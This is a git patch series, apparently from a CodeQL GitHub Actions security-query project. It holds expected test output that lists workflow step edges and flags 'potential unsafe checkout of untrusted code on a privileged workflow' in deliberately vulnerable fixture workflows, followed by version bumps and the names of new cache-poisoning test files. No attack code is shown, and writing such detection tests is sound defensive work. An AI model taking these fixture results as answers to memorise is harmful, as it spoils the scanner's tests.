.github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | +| .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | +| .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | +| .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | +| .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | +| .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | +| .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | +| .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | +| .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | +| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | +| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | +| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | +| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | +| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | +| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | +| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | +| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | +| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | +| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | +| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | +| .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | +| .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | +| .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | +| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | +| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | +| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | +| .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | +| .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | +| .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | +| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | +| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | +| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:28:9:31:6 | Run Step | +| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:31:9:34:6 | Run Step | +| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:34:9:36:2 | Run Step | +| .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | +| .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | .github/workflows/dependabot1.yml:28:9:31:6 | Run Step | +| .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | .github/workflows/dependabot1.yml:31:9:34:6 | Run Step | +| .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | .github/workflows/dependabot1.yml:34:9:36:2 | Run Step | +| .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | .github/workflows/dependabot1.yml:28:9:31:6 | Run Step | +| .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | .github/workflows/dependabot1.yml:31:9:34:6 | Run Step | +| .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | .github/workflows/dependabot1.yml:34:9:36:2 | Run Step | +| .github/workflows/dependabot1.yml:28:9:31:6 | Run Step | .github/workflows/dependabot1.yml:31:9:34:6 | Run Step | +| .github/workflows/dependabot1.yml:28:9:31:6 | Run Step | .github/workflows/dependabot1.yml:34:9:36:2 | Run Step | +| .github/workflows/dependabot1.yml:31:9:34:6 | Run Step | .github/workflows/dependabot1.yml:34:9:36:2 | Run Step | +| .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | .github/workflows/dependabot1.yml:43:9:45:29 | Uses Step | +| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | +| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | +| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | +| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | +| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | +| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | +| .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | +| .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | +| .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | +| .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | +| .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | +| .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | +| .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | +| .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | +| .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | +| .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | +| .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | +| .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | +| .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | +| .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | +| .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | +| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:18:11:21:8 | Uses Step | +| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | +| .github/workflows/gitcheckout.yml:18:11:21:8 | Uses Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | +| .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | +| .github/workflows/issue_comment_heuristic.yml:11:9:24:6 | Uses Step: get-pr-info | .github/workflows/issue_comment_heuristic.yml:24:9:28:6 | Run Step: get-sha | +| .github/workflows/issue_comment_heuristic.yml:11:9:24:6 | Uses Step: get-pr-info | .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | +| .github/workflows/issue_comment_heuristic.yml:24:9:28:6 | Run Step: get-sha | .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | +| .github/workflows/issue_comment_heuristic.yml:37:7:48:4 | Run Step: vars | .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | +| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:38:9:52:6 | Uses Step: get-pr-info | .github/workflows/issue_comment_octokit.yml:52:9:57:6 | Run Step: get-sha | +| .github/workflows/issue_comment_octokit.yml:38:9:52:6 | Uses Step: get-pr-info | .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:52:9:57:6 | Run Step: get-sha | .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:66:9:79:6 | Uses Step: sha | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:87:9:95:6 | Uses Step: sha | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | +| .github/workflows/label_trusted_checkout.yml:11:7:15:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | +| .github/workflows/label_trusted_checkout.yml:11:7:15:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step | +| .github/workflows/label_trusted_checkout.yml:11:7:15:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | +| .github/workflows/label_trusted_checkout.yml:11:7:15:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | +| .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step | +| .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | +| .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | +| .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | +| .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | +| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | +| .github/workflows/level0.yml:33:9:36:6 | Uses Step | .github/workflows/level0.yml:36:9:39:6 | Uses Step | +| .github/workflows/level0.yml:33:9:36:6 | Uses Step | .github/workflows/level0.yml:39:9:52:2 | Run Step: check_profanities | +| .github/workflows/level0.yml:36:9:39:6 | Uses Step | .github/workflows/level0.yml:39:9:52:2 | Run Step: check_profanities | +| .github/workflows/level0.yml:62:9:65:6 | Uses Step | .github/workflows/level0.yml:65:9:86:2 | Uses Step | +| .github/workflows/level0.yml:96:9:99:6 | Uses Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | +| .github/workflows/level0.yml:96:9:99:6 | Uses Step | .github/workflows/level0.yml:103:9:107:6 | Uses Step | +| .github/workflows/level0.yml:96:9:99:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | +| .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:103:9:107:6 | Uses Step | +| .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | +| .github/workflows/level0.yml:103:9:107:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | +| .github/workflows/level0.yml:122:9:125:6 | Uses Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | +| .github/workflows/level0.yml:122:9:125:6 | Uses Step | .github/workflows/level0.yml:129:9:133:6 | Uses Step | +| .github/workflows/level0.yml:122:9:125:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | +| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:129:9:133:6 | Uses Step | +| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | +| .github/workflows/level0.yml:129:9:133:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | +| .github/workflows/mend.yml:13:9:22:6 | Run Step: set_ref | .github/workflows/mend.yml:22:9:29:6 | Uses Step | +| .github/workflows/mend.yml:13:9:22:6 | Run Step: set_ref | .github/workflows/mend.yml:29:9:33:28 | Uses Step | +| .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | +| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | .github/workflows/priv_pull_request_checkout.yml:20:9:23:52 | Run Step | +| .github/workflows/test1.yml:18:9:21:6 | Uses Step | .github/workflows/test1.yml:21:9:24:6 | Run Step | +| .github/workflows/test1.yml:18:9:21:6 | Uses Step | .github/workflows/test1.yml:24:9:25:39 | Run Step | +| .github/workflows/test1.yml:21:9:24:6 | Run Step | .github/workflows/test1.yml:24:9:25:39 | Run Step | +| .github/workflows/test2.yml:13:9:16:6 | Uses Step | .github/workflows/test2.yml:16:9:20:52 | Uses Step | +| .github/workflows/test3.yml:28:9:33:6 | Uses Step | .github/workflows/test3.yml:33:9:35:6 | Run Step | +| .github/workflows/test3.yml:28:9:33:6 | Uses Step | .github/workflows/test3.yml:35:9:41:63 | Uses Step | +| .github/workflows/test3.yml:33:9:35:6 | Run Step | .github/workflows/test3.yml:35:9:41:63 | Uses Step | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:25:7:31:4 | Uses Step | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:31:7:33:4 | Uses Step | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:33:7:38:4 | Uses Step | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:38:7:40:4 | Run Step | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:31:7:33:4 | Uses Step | +| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:33:7:38:4 | Uses Step | +| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:38:7:40:4 | Run Step | +| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | +| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | +| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | +| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:33:7:38:4 | Uses Step | +| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:38:7:40:4 | Run Step | +| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | +| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | +| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | +| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:38:7:40:4 | Run Step | +| .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | +| .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | +| .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | +| .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test4.yml:38:7:40:4 | Run Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | +| .github/workflows/test4.yml:38:7:40:4 | Run Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | +| .github/workflows/test4.yml:38:7:40:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | +| .github/workflows/test4.yml:38:7:40:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test4.yml:40:7:41:4 | Run Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | +| .github/workflows/test4.yml:40:7:41:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | +| .github/workflows/test4.yml:40:7:41:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | +| .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test4.yml:42:7:43:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/unpinned_tags.yml:9:7:10:4 | Uses Step | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | +| .github/workflows/unpinned_tags.yml:9:7:10:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | +| .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | +| .github/workflows/untrusted_checkout2.yml:7:9:14:6 | Run Step: pr_number | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | +| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | +| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | +| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | +| .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | +| .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | +| .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | +| .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | +#select +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/mend.yml:29:9:33:28 | Uses Step | .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | From 878317ab6b28ecbdf2838a5ea393e223745a5db1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 26 Jun 2024 19:18:10 +0200 Subject: [PATCH 351/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 761554c60e6d..847a7b83e541 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.4 +version: 0.1.5 dependencies: codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 9ccc911594f5..be2b4e428c98 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.4 +version: 0.1.5 groups: [actions, queries] suites: codeql-suites extractor: javascript From 76b115deb09da540e370ebdbf557d19a84dc41fb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 26 Jun 2024 19:44:44 +0200 Subject: [PATCH 352/707] Dedup Cache poisoning and Untrusted checkout --- ql/src/Security/CWE-349/CachePoisoning.ql | 3 +- .../CWE-349/.github/workflows/poc.yml | 63 ++++++++++++++++++ .../CWE-349/.github/workflows/poc2.yml | 58 +++++++++++++++++ .../CWE-349/.github/workflows/poc3.yml | 64 +++++++++++++++++++ 